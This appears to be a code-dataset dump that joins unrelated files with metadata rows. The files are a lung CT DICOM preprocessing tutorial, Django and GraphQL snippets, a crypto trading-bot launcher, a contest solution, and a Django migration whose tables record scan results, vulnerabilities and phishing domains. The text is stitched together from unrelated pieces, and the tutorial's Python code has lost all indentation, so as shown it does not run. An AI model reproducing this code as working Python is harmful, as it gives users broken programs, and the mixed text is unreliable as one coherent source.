# C) You can install Jupyter Notebook, and viewer for iPython notebooks, and then use it to run this code inline after downloading it from Github. To do this, enter the command "pip install jupyter" into your command line. If installed successfully, you can use the "jupyter notebook" command in the folder where you downloaded your data.
#
# You may need to install some additional python packages if running this code locally. Particularly, Anaconda does not come with the package "pydicom", which is necessary to run this code. Install it with the command line "pip install pydicom."
#
# ***
# ## Introduction
#
# Working with these files can be a challenge, especially given their heterogeneous nature. Some preprocessing is required before they are ready for consumption by your CNN.
#
# Fortunately, I participated in the LUNA16 competition as part of a university course on computer aided diagnosis, so I have some experience working with these files. At this moment we top the leaderboard there :)
#
# **This tutorial aims to provide a comprehensive overview of useful steps to take before the data hits your ConvNet/other ML method.**
#
# What we will cover:
#
# * **Loading the DICOM files**, and adding missing metadata
# * **Converting the pixel values to *Hounsfield Units (HU)***, and what tissue these unit values correspond to
# * **Resampling** to an isomorphic resolution to remove variance in scanner resolution.
# * **3D plotting**, visualization is very useful to see what we are doing.
# * **Lung segmentation**
# * **Normalization** that makes sense.
# * **Zero centering** the scans.
#
#
# ---
#
# Before we start, let's import some packages and determine the available patients.
# In[1]:
# Only use this line if displaying in an iPython notebook.
# get_ipython().magic(u'matplotlib inline')
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import dicom
import os
import scipy.ndimage
import matplotlib.pyplot as plt
from skimage import measure, morphology
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
# Some constants
INPUT_FOLDER = './sample_images/'
patients = os.listdir(INPUT_FOLDER)
patients.sort()
# # Loading the files
# Dicom is the de-facto file standard in medical imaging. This is my first time working with it, but it seems to be fairly straight-forward. These files contain a lot of metadata (such as the pixel size, so how long one pixel is in every dimension in the real world).
#
# This pixel size/coarseness of the scan differs from scan to scan (e.g. the distance between slices may differ), which can hurt performance of CNN approaches. We can deal with this by isomorphic resampling, which we will do later.
#
# Below is code to load a scan, which consists of multiple slices, which we simply save in a Python list. Every folder in the dataset is one scan (so one patient). One metadata field is missing, the pixel size in the Z direction, which is the slice thickness. Fortunately we can infer this, and we add this to the metadata.
# In[2]:
# Load the scans in given folder path
def load_scan(path):
slices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]
slices.sort(key = lambda x: int(x.ImagePositionPatient[2]))
try:
slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])
except:
slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)
for s in slices:
s.SliceThickness = slice_thickness
return slices
# The unit of measurement in CT scans is the **Hounsfield Unit (HU)**, which is a measure of radiodensity. CT scanners are carefully calibrated to accurately measure this. From Wikipedia:
#
# ![HU examples][1]
#
# By default however, the returned values are not in this unit. Let's fix this.
#
# Some scanners have cylindrical scanning bounds, but the output image is square. The pixels that fall outside of these bounds get the fixed value -2000. The first step is setting these values to 0, which currently corresponds to air. Next, let's go back to HU units, by multiplying with the rescale slope and adding the intercept (which are conveniently stored in the metadata of the scans!).
#
# [1]: http://i.imgur.com/4rlyReh.png
# In[3]:
def get_pixels_hu(slices):
image = np.stack([s.pixel_array for s in slices])
# Convert to int16 (from sometimes int16),
# should be possible as values should always be low enough (<32k)
image = image.astype(np.int16)
# Set outside-of-scan pixels to 0
# The intercept is usually -1024, so air is approximately 0
image[image == -2000] = 0
# Convert to Hounsfield units (HU)
for slice_number in range(len(slices)):
intercept = slices[slice_number].RescaleIntercept
slope = slices[slice_number].RescaleSlope
if slope != 1:
image[slice_number] = slope * image[slice_number].astype(np.float64)
image[slice_number] = image[slice_number].astype(np.int16)
image[slice_number] += np.int16(intercept)
return np.array(image, dtype=np.int16)
# Let's take a look at one of the patients.
# In[4]:
first_patient = load_scan(INPUT_FOLDER + patients[0])
first_patient_pixels = get_pixels_hu(first_patient)
plt.hist(first_patient_pixels.flatten(), bins=80, color='c')
plt.xlabel("Hounsfield Units (HU)")
plt.ylabel("Frequency")
plt.show()
# Show some slice in the middle
plt.imshow(first_patient_pixels[80], cmap=plt.cm.gray)
plt.show()
# Looking at the table from Wikipedia and this histogram, we can clearly see which pixels are air and which are tissue. We will use this for lung segmentation in a bit :)
#
#
# ----------
# # Resampling
# A scan may have a pixel spacing of `[2.5, 0.5, 0.5]`, which means that the distance between slices is `2.5` millimeters. For a different scan this may be `[1.5, 0.725, 0.725]`, this can be problematic for automatic analysis (e.g. using ConvNets)!
#
# A common method of dealing with this is resampling the full dataset to a certain isotropic resolution. If we choose to resample everything to 1mm*1mm*1mm pixels we can use 3D convnets without worrying about learning zoom/slice thickness invariance.
#
# Whilst this may seem like a very simple step, it has quite some edge cases due to rounding. Also, it takes quite a while.
#
# Below code worked well for us (and deals with the edge cases):
# In[5]:
def resample(image, scan, new_spacing=[1,1,1]):
# Determine current pixel spacing
spacing = map(float, ([scan[0].SliceThickness] + scan[0].PixelSpacing))
spacing = np.array(list(spacing))
resize_factor = spacing / new_spacing
new_real_shape = image.shape * resize_factor
new_shape = np.round(new_real_shape)
real_resize_factor = new_shape / image.shape
new_spacing = spacing / real_resize_factor
image = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')
return image, new_spacing
# Please note that when you apply this, to save the new spacing! Due to rounding this may be slightly off from the desired spacing (above script picks the best possible spacing with rounding).
#
# Let's resample our patient's pixels to an isomorphic resolution of 1 by 1 by 1 mm.
# In[6]:
pix_resampled, spacing = resample(first_patient_pixels, first_patient, [1,1,1])
print("Shape before resampling\t", first_patient_pixels.shape)
print("Shape after resampling\t", pix_resampled.shape)
# # 3D plotting the scan
# For visualization it is useful to be able to show a 3D image of the scan. Unfortunately, the packages available in this Kaggle docker image is very limited in this sense, so we will use marching cubes to create an approximate mesh for our 3D object, and plot this with matplotlib. Quite slow and ugly, but the best we can do.
# In[7]:
def plot_3d(image, threshold=-300):
# Position the scan upright,
# so the head of the patient would be at the top facing the camera
p = image.transpose(2,1,0)
verts, faces = measure.marching_cubes(p, threshold)
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111, projection='3d')
# Fancy indexing: `verts[faces]` to generate a collection of triangles
mesh = Poly3DCollection(verts[faces], alpha=0.1)
face_color = [0.5, 0.5, 1]
mesh.set_facecolor(face_color)
ax.add_collection3d(mesh)
ax.set_xlim(0, p.shape[0])
ax.set_ylim(0, p.shape[1])
ax.set_zlim(0, p.shape[2])
plt.show()
# Our plot function takes a threshold argument which we can use to plot certain structures, such as all tissue or only the bones. 400 is a good threshold for showing the bones only (see Hounsfield unit table above). Let's do this!
# In[8]:
plot_3d(pix_resampled, 400)
# Spooky!
#
# # Lung segmentation
# In order to reduce the problem space, we can segment the lungs (and usually some tissue around it). The method that me and my student colleagues developed was quite effective.
#
# It involves quite a few smart steps. It consists of a series of applications of region growing and morphological operations. In this case, we will use only connected component analysis.
#
# The steps:
#
# * Threshold the image (-320 HU is a good threshold, but it doesn't matter much for this approach)
# * Do connected components, determine label of air around person, fill this with 1s in the binary image
# * Optionally: For every axial slice in the scan, determine the largest solid connected component (the body+air around the person), and set others to 0. This fills the structures in the lungs in the mask.
# * Keep only the largest air pocket (the human body has other pockets of air here and there).
# In[9]:
def largest_label_volume(im, bg=-1):
vals, counts = np.unique(im, return_counts=True)
counts = counts[vals != bg]
vals = vals[vals != bg]
if len(counts) > 0:
return vals[np.argmax(counts)]
else:
return None
def segment_lung_mask(image, fill_lung_structures=True):
# not actually binary, but 1 and 2.
# 0 is treated as background, which we do not want
binary_image = np.array(image > -320, dtype=np.int8)+1
labels = measure.label(binary_image)
# Pick the pixel in the very corner to determine which label is air.
# Improvement: Pick multiple background labels from around the patient
# More resistant to "trays" on which the patient lays cutting the air
# around the person in half
background_label = labels[0,0,0]
#Fill the air around the person
binary_image[background_label == labels] = 2
# Method of filling the lung structures (that is superior to something like
# morphological closing)
if fill_lung_structures:
# For every slice we determine the largest solid structure
for i, axial_slice in enumerate(binary_image):
axial_slice = axial_slice - 1
labeling = measure.label(axial_slice)
l_max = largest_label_volume(labeling, bg=0)
if l_max is not None: #This slice contains some lung
binary_image[i][labeling != l_max] = 1
binary_image -= 1 #Make the image actual binary
binary_image = 1-binary_image # Invert it, lungs are now 1
# Remove other air pockets insided body
labels = measure.label(binary_image, background=0)
l_max = largest_label_volume(labels, bg=0)
if l_max is not None: # There are air pockets
binary_image[labels != l_max] = 0
return binary_image
# In[10]:
segmented_lungs = segment_lung_mask(pix_resampled, False)
segmented_lungs_fill = segment_lung_mask(pix_resampled, True)
# In[11]:
plot_3d(segmented_lungs, 0)
# Beautiful!
#
# But there's one thing we can fix, it is probably a good idea to include structures within the lung (as the nodules are solid), we do not only want to air in the lungs.
# In[12]:
plot_3d(segmented_lungs_fill, 0)
# That's better. Let's also visualize the difference between the two.
# In[13]:
plot_3d(segmented_lungs_fill - segmented_lungs, 0)
# Pretty cool, no?
#
# Anyway, when you want to use this mask, **remember to first apply a dilation morphological operation** on it (i.e. with a circular kernel). This expands the mask in all directions. The air + structures in the lung alone will not contain all nodules, in particular it will miss those that are stuck to the side of the lung, where they often appear! So expand the mask a little :)
#
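# As a rough sketch, that dilation step could look like the snippet below. It uses
# `scipy.ndimage.binary_dilation` with its default structuring element; the 10 iterations
# (roughly a 10 mm margin at the 1x1x1 mm resampling) and the `dilated_lungs` name are
# only a starting point, so tune both for your own pipeline.

# In[ ]:


dilated_lungs = scipy.ndimage.binary_dilation(segmented_lungs_fill, iterations=10)
print("Mask voxels before/after dilation:", segmented_lungs_fill.sum(), dilated_lungs.sum())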
# **This segmentation may fail for some edge cases**. It relies on the fact that the air outside the patient is not connected to the air in the lungs. If the patient has a [tracheostomy](https://en.wikipedia.org/wiki/Tracheotomy), this will not be the case, I do not know whether this is present in the dataset. Also, particulary noisy images (for instance due to a pacemaker in the image below) this method may also fail. Instead, the second largest air pocket in the body will be segmented. You can recognize this by checking the fraction of image that the mask corresponds to, which will be very small for this case. You can then first apply a morphological closing operation with a kernel a few mm in size to close these holes, after which it should work (or more simply, do not use the mask for this image).
#
# ![pacemaker example][1]
#
# # Normalization
# Our values currently range from -1024 to around 2000. Anything above 400 is not interesting to us, as these are simply bones with different radiodensity. A commonly used set of thresholds in the LUNA16 competition to normalize between are -1000 and 400. Here's some code you can use:
#
#
# [1]: http://i.imgur.com/po0eX1L.png
# In[14]:
MIN_BOUND = -1000.0
MAX_BOUND = 400.0
def normalize(image):
image = (image - MIN_BOUND) / (MAX_BOUND - MIN_BOUND)
image[image>1] = 1.
image[image<0] = 0.
return image
# # Zero centering
#
# As a final preprocessing step, it is advisory to zero center your data so that your mean value is 0. To do this you simply subtract the mean pixel value from all pixels.
#
# To determine this mean you simply average all images in the whole dataset. If that sounds like a lot of work, we found this to be around 0.25 in the LUNA16 competition.
#
# **Warning: Do not zero center with the mean per image (like is done in some kernels on here). The CT scanners are calibrated to return accurate HU measurements. There is no such thing as an image with lower contrast or brightness like in normal pictures.**
# In[15]:
PIXEL_MEAN = 0.25
def zero_center(image):
image = image - PIXEL_MEAN
return image
# # What's next?
#
# With these steps your images are ready for consumption by your CNN or other ML method :). You can do all these steps offline (one time and save the result), and I would advise you to do so and let it run overnight as it may take a long time.
#
# **Tip:** To save storage space, don't do normalization and zero centering beforehand, but do this online (during training, just after loading). If you don't do this yet, your image are int16's, which are smaller than float32s and easier to compress as well.
#
# **If this tutorial helped you at all, please upvote it and leave a comment :)**
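# As a rough sketch, such an online loading step could look like the snippet below
# (the function and argument names are only illustrative): save the resampled int16
# volumes offline, then normalize and zero center each scan at load time.

# In[ ]:


def load_for_training(pixels_int16):
    # pixels_int16: a resampled HU volume that was saved offline as int16
    image = normalize(pixels_int16.astype(np.float32))
    return zero_center(image)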
| [
"[email protected]"
] | |
d55ebe60b8e0bcc0a970d6ad2f7b180ce8ffd6f3 | 6702a014d58a70808214f4ad0ce32aef11c106fe | /manage.py | ae7fa45b3669d123f62de0eb07941bf87d9f5b4f | [] | no_license | histuckyi/Django_tutorial | cb3373521b90d3505dc20abed3642aeb9a1e32ee | 3a63cfae2173e0e44701b23c2aca5f314228655f | refs/heads/master | 2020-06-11T06:17:00.400223 | 2019-06-26T10:12:49 | 2019-06-26T10:12:49 | 193,873,436 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 573 | py | #!/usr/bin/env python
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_tutorial.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
fcaccd3bf997e4178ad0a6a92d0e8fd872093ed1 | e838ea567fe5216bd83b72d5cc549363a666ac3d | /registry/serializers/data_category.py | 1513f6a2ef2eb029d60b448425a25df85bfe014e | [] | no_license | iuriramos/swim-registry | f7ffee9a57b92021e7066820249092d1558a944d | 7c71d294b5aa7cb40e01ed559e2fcb81d2e1f43a | refs/heads/master | 2021-09-13T20:22:29.624535 | 2018-05-03T21:30:26 | 2018-05-03T21:30:26 | 85,312,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | from registry.models.data_category import DataCategory
from rest_framework import serializers, viewsets
class DataCategorySerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = DataCategory
fields = ('pk', 'name', )
class DataCategoryViewSet(viewsets.ModelViewSet):
queryset = DataCategory.objects.all()
serializer_class = DataCategorySerializer
| [
"[email protected]"
] | |
084e8d38f2a41afdbacc05279be12f974947234b | b72f9d9f0769265cdea2b8caff145af9c532ea09 | /rcl_contest_2020_final/a.py | 8f28af7d879a8f73eacf82b2b20564e09dc9ba94 | [] | no_license | ritzcr/AtCoder | 3335fefa8fb1989a0f9da80fe6d0902b46aa2d1f | 15097b0c2568ace653e5080d789047531e50edde | refs/heads/master | 2021-02-12T19:16:41.757421 | 2020-07-05T06:30:57 | 2020-07-05T06:30:57 | 244,620,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | N, M = map(int, input().split())
dice = [1, 2, 3, 4, 5, 6]
dice[0] = 6
output = " ".join(map(str, dice))
print(output)
for _ in range(M):
d, v, x = map(int, input().split())
dice[1] = 6
output = " ".join(map(str, dice))
print(output)
| [
"[email protected]"
] | |
019d0099a757ba400b6c6c8ff733026d56b60154 | 79e5a3733b261f11cf13526460c39d3d722744dd | /strawberry/types/datetime.py | 7abbf73d51ab32343b67f6c505b81f80fa1f7cc7 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | yngvarsh/strawberry | 73cc0e0a862dc4796549f925ac167ec6768d5ade | 96b8c701caaa0510e7118928e9e3c00d4ef5a05c | refs/heads/master | 2020-12-11T13:13:57.579007 | 2020-01-15T11:50:17 | 2020-01-15T11:50:17 | 233,857,471 | 0 | 0 | MIT | 2020-01-14T14:17:58 | 2020-01-14T14:17:57 | null | UTF-8 | Python | false | false | 663 | py | import datetime
import aniso8601
from ..custom_scalar import scalar
def _serialize_isoformatted(value):
return value.isoformat()
Date = scalar(
datetime.date,
name="Date",
description="Date (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_date,
)
DateTime = scalar(
datetime.datetime,
name="DateTime",
description="Date with time (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_datetime,
)
Time = scalar(
datetime.time,
name="Time",
description="Time (isoformat)",
serialize=_serialize_isoformatted,
parse_value=aniso8601.parse_time,
)
| [
"[email protected]"
] | |
bacb702adf0fd1d047d9ffe824ab720ad30d31ad | 2eaade99a8073faaf68c46eac48d8826b351fe17 | /main.py | 0ae913ee6b2c31ee876af199db61f9af08dd795d | [] | no_license | StevenMaharaj/traderv1 | 30ebb6f0242d986aace29ebc6e956bd78e68f02b | a1edab9722c2735302126d23ad1c9cd107152635 | refs/heads/main | 2023-07-22T21:56:37.266832 | 2021-09-08T05:34:50 | 2021-09-08T05:34:50 | 400,120,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,381 | py | from executionHandlers.execution import ExecutionHandler
from queue import Queue
from threading import Thread
from dataHandlers.deribit import DeribitTOB
import sys
from event import Event, SignalEvent
from accountHandlers.deribit import DeribitOrder
from executionHandlers.deribit import DeribitExecutionHandler
from datetime import datetime
from time import sleep
import argparse
import logging
import os
from Strategies.ScalperDeribit import scalper_deribit
from portfolio import Portfolio
log_folder = 'logs'
now: datetime = datetime.now()
now_string = datetime.strftime(now, '%y%m%d%H-%M-%S')
logging.basicConfig(filename=os.path.join(log_folder, f'{now_string}.log'),
level=logging.INFO, format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--isLive", help="Live trading or test")
args = parser.parse_args()
is_live: bool = eval(args.isLive)
if is_live:
print("This seesion will run live")
else:
print("This session is a test")
event_queue = Queue()
signal_event_queue = Queue()
portfolio = Portfolio({}, {})
deribit_scalper = scalper_deribit.Scalper(event_queue, signal_event_queue,
working_orders=5, portfolio=portfolio,
exchange='deribit',symbols=["BTC-PERPETUAL"], is_live=is_live,order_dist=20)
deribit_scalper.run()
| [
"="
] | = |
0c82b151fa1b84f52808f5d9cba3874637a21ab4 | 7e0f0662faee84f49794fb342199a59e570d4d15 | /env/bin/mako-render | 480cddd311d240ca506dd3dfdd95adb94f717789 | [] | no_license | Samkanja/headline | 03cfed21a21d71e91d9e37edf821c5d3d1a432c4 | be792d6ac7e23ba04fbcacbfec84ea659ba67e32 | refs/heads/master | 2023-06-19T14:01:21.431839 | 2021-07-08T13:28:37 | 2021-07-08T13:28:37 | 380,808,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | #!/home/kskanja/stuff/down/headline/env/bin/python3.9
# -*- coding: utf-8 -*-
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"[email protected]"
] | ||
0adafa647dec796abb4b3232bac173145bced8c4 | c71c8dc74cc70b06c0c703ef409363496f95871e | /src/agents/migrations/0001_initial.py | f1028782e91e944b84f19f2fc9b109c26bd8daea | [] | no_license | l3h4ng/test1 | 76e882882f8f8a5e0f87088abff13eeac90f33f3 | 870583fdc6107e16abf04434d83c285f273215f3 | refs/heads/master | 2020-04-08T07:18:18.315397 | 2018-11-26T08:57:27 | 2018-11-26T08:57:27 | 159,134,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,451 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-03-22 02:37
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
import time
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CrawlDataModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.CharField(blank=True, max_length=250, null=True)),
('name', models.CharField(blank=True, max_length=150, null=True)),
('parent_id', models.IntegerField(blank=True, null=True)),
('loc_type', models.IntegerField(choices=[(0, 'file'), (1, 'folder')], default=0)),
('security_level', models.IntegerField(choices=[(0, 'safe'), (1, 'suspect'), (2, 'malware')], default=0)),
],
options={
'db_table': 'website_crawl_data',
},
),
migrations.CreateModel(
name='GoogleHackingKeywordModels',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.IntegerField(auto_created=True, default=time.time)),
('category', models.CharField(default='', max_length=250)),
('keyword', models.CharField(blank=True, default='', max_length=500)),
('google_search', models.CharField(blank=True, default='', max_length=500)),
('summary', models.CharField(blank=True, default='', max_length=500)),
],
options={
'db_table': 'google_hacking_db',
},
),
migrations.CreateModel(
name='HostServicesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip_addr', models.CharField(blank=True, max_length=45, null=True)),
('name', models.CharField(blank=True, max_length=45, null=True)),
('port', models.IntegerField()),
('protocol', models.CharField(default='tcp', max_length=45)),
('state', models.CharField(default='open', max_length=45)),
('version', models.CharField(blank=True, max_length=150, null=True)),
],
options={
'db_table': 'host_services',
},
),
migrations.CreateModel(
name='HostsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip_addr', models.CharField(max_length=250)),
('severity', models.IntegerField(default=1)),
('device_type', models.IntegerField(choices=[(0, 'general purpose'), (1, 'router'), (2, 'firewall'), (3, 'switch'), (4, 'printer'), (5, 'webcam'), (6, 'phone')], default=0)),
('status', models.IntegerField(default=0)),
('edges', django.contrib.postgres.fields.ArrayField(base_field=models.IntegerField(), blank=True, default=[], size=None)),
('edges_extend', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=20), blank=True, default=[], size=None)),
],
options={
'db_table': 'hosts',
},
),
migrations.CreateModel(
name='HostVulnerabilityModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('detection_time', models.IntegerField(auto_created=True, blank=True, default=time.time)),
('name', models.TextField(blank=True, null=True)),
('is_fixed', models.BooleanField(default=False)),
('is_ignored', models.BooleanField(default=False)),
('attack_details', models.TextField(blank=True, default='', null=True)),
('port', models.CharField(blank=True, max_length=45, null=True)),
('request', models.TextField(blank=True, default='', null=True)),
('output', models.TextField(blank=True, default='', null=True)),
('affects', models.TextField(blank=True, null=True)),
('scanner_scan_id', models.CharField(default='', max_length=100)),
('scanner_vuln_id', models.CharField(default='', max_length=100)),
],
options={
'db_table': 'host_vulnerability',
},
),
migrations.CreateModel(
name='ScansModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_time', models.IntegerField(auto_created=True, default=time.time, editable=False)),
('percent', models.IntegerField(default=0)),
('status', models.IntegerField(choices=[(0, b'Kh\xe1\xbb\x9fi t\xe1\xba\xa1o'), (1, b'\xc4\x90ang ch\xe1\xbb\x9d qu\xc3\xa9t'), (2, b'\xc4\x90ang qu\xc3\xa9t'), (3, b'T\xe1\xba\xa1m d\xe1\xbb\xabng'), (4, b'Qu\xc3\xa9t l\xe1\xbb\x97i'), (5, b'Ho\xc3\xa0n th\xc3\xa0nh'), (6, b'Ho\xc3\xa0n th\xc3\xa0nh c\xc6\xa1 b\xe1\xba\xa3n')], default=0)),
('scripted_scan', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=225), blank=True, default=[], size=None)),
('finish_time', models.IntegerField(null=True)),
],
options={
'db_table': 'scans',
},
),
migrations.CreateModel(
name='ServerConfigurationsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField(blank=True, null=True)),
('url', models.CharField(default='', max_length=500)),
('protocol', models.CharField(blank=True, default='', max_length=500)),
('description', models.TextField(blank=True, null=True)),
('ref', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'server_configurations_vulnerability',
},
),
migrations.CreateModel(
name='WebsiteBlacklistCheckingModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.IntegerField(choices=[(0, 'GOOGLE SAFE BROWSING'), (1, 'NOTRTON SAFE WEB'), (2, 'PHISHTANK'), (3, 'OPERA BROWSER'), (4, 'SITEADVISOR'), (5, 'Sucuri Malware Labs'), (6, 'SpamHaus DBL'), (7, 'Yandex'), (8, 'ESET')], default=0)),
('result', models.IntegerField(choices=[(0, 'Clean'), (1, 'Warning')], default=0)),
],
options={
'db_table': 'website_blacklist_check',
},
),
migrations.CreateModel(
name='WebsiteContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('level', models.IntegerField(default=0)),
('tag', models.CharField(default='', max_length=50)),
('attrib', models.CharField(blank=True, default='', max_length=250)),
('content', models.TextField(blank=True, default='')),
('position', models.IntegerField(default=0)),
('children_counts', models.IntegerField(default=0)),
('crawler_time', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='agents.WebsiteContentModel')),
],
options={
'db_table': 'website_contents',
},
),
migrations.CreateModel(
name='WebsiteDatabasesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('db_type', models.CharField(blank=True, max_length=45, null=True)),
('version', models.CharField(blank=True, max_length=45, null=True)),
('user', models.CharField(blank=True, max_length=45, null=True)),
('password', models.CharField(blank=True, max_length=45, null=True)),
('is_db_administrator', models.BooleanField(default=False)),
('databases', django.contrib.postgres.fields.jsonb.JSONField(default={})),
],
options={
'db_table': 'website_database',
},
),
migrations.CreateModel(
name='WebsiteGoogleHackingDetectModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('link', models.CharField(blank=True, default='', max_length=500)),
('total_results', models.IntegerField(blank=True, default=0)),
('results', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(default='', max_length=500), blank=True, default=[], size=None)),
('keyword', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='websites', to='agents.GoogleHackingKeywordModels')),
],
options={
'db_table': 'website_ghdb_detect',
},
),
migrations.CreateModel(
name='WebsiteMonitorContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('new_content', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='newcontent', to='agents.WebsiteContentModel')),
('old_content', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='oldcontent', to='agents.WebsiteContentModel')),
],
options={
'db_table': 'website_monitor_content',
},
),
migrations.CreateModel(
name='WebsiteMonitorStatusModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('monitor_time', models.IntegerField(auto_created=True, blank=True, default=time.time, null=True)),
('ping_status', models.BooleanField(default=False)),
('ping_response', models.IntegerField(blank=True, default=0, max_length=10)),
('web_status', models.IntegerField(default=200, max_length=5)),
('web_load_response', models.IntegerField(blank=True, default=0, max_length=10)),
],
options={
'db_table': 'website_monitor_status',
},
),
migrations.CreateModel(
name='WebsiteMonitorUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.CharField(default='', max_length=100)),
('path', models.CharField(default='', max_length=500)),
('is_enabled', models.BooleanField(default=True)),
('max_level', models.IntegerField(default=3)),
('is_training', models.BooleanField(default=True)),
('counts', models.IntegerField(default=0)),
],
options={
'db_table': 'website_monitor_urls',
},
),
migrations.CreateModel(
name='WebsitePhishingDomainDetectModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('domain', models.CharField(default='', max_length=250)),
('is_exits', models.BooleanField(default=False)),
('security_level', models.IntegerField(choices=[(0, 'safe'), (1, 'suspect'), (2, 'malware')], default=0)),
('ip_addr', models.CharField(blank=True, default='', max_length=500)),
],
options={
'db_table': 'website_phishing_alert',
},
),
migrations.CreateModel(
name='WebsiteSecurityAlertModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.IntegerField(choices=[(0, 'device'), (1, 'ip_addr'), (2, 'service'), (3, 'subdomain'), (4, 'path'), (5, 'vulnerablity')], default=0)),
('stauts', models.IntegerField(choices=[(0, 'new'), (1, 'deleted'), (2, 'modify')], default=0)),
('details', django.contrib.postgres.fields.jsonb.JSONField(default={})),
],
options={
'db_table': 'website_monitor_security',
},
),
migrations.CreateModel(
name='WebsiteStaticContentModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('url_monitor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='contents', to='agents.WebsiteMonitorUrl')),
],
options={
'db_table': 'website_static_contents',
},
),
migrations.CreateModel(
name='WebsiteSubdomainsModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subdomain', models.CharField(max_length=200)),
('ip_addr', models.CharField(default='', max_length=200)),
('is_monitor', models.BooleanField(default=False)),
],
options={
'db_table': 'website_subdomains',
},
),
migrations.CreateModel(
name='WebsiteTechnologiesModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('technology', models.CharField(default='', max_length=200)),
('app', models.CharField(blank=True, default='', max_length=200)),
('version', models.CharField(blank=True, default='', max_length=20)),
],
options={
'db_table': 'website_technology',
},
),
migrations.CreateModel(
name='HostDetailsModel',
fields=[
('host', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='details', serialize=False, to='agents.HostsModel')),
('hostname', models.CharField(blank=True, max_length=250, null=True)),
('os', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=100), blank=True, default=[], size=None)),
('last_boot', models.CharField(blank=True, max_length=45, null=True)),
('mac_addr', models.CharField(blank=True, max_length=45, null=True)),
('ipv4', models.CharField(blank=True, max_length=45, null=True)),
('ipv6', models.CharField(blank=True, max_length=45, null=True)),
('vendor', models.CharField(blank=True, max_length=45, null=True)),
('status', models.CharField(blank=True, max_length=45, null=True)),
('state', models.CharField(blank=True, max_length=45, null=True)),
],
options={
'db_table': 'host_details',
},
),
migrations.CreateModel(
name='HostStatisticsModel',
fields=[
('host', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, related_name='statistics', serialize=False, to='agents.HostsModel')),
('ip_addr', models.CharField(blank=True, max_length=45, null=True)),
('services_count', models.IntegerField(default=0)),
('subdomains_count', models.IntegerField(default=0)),
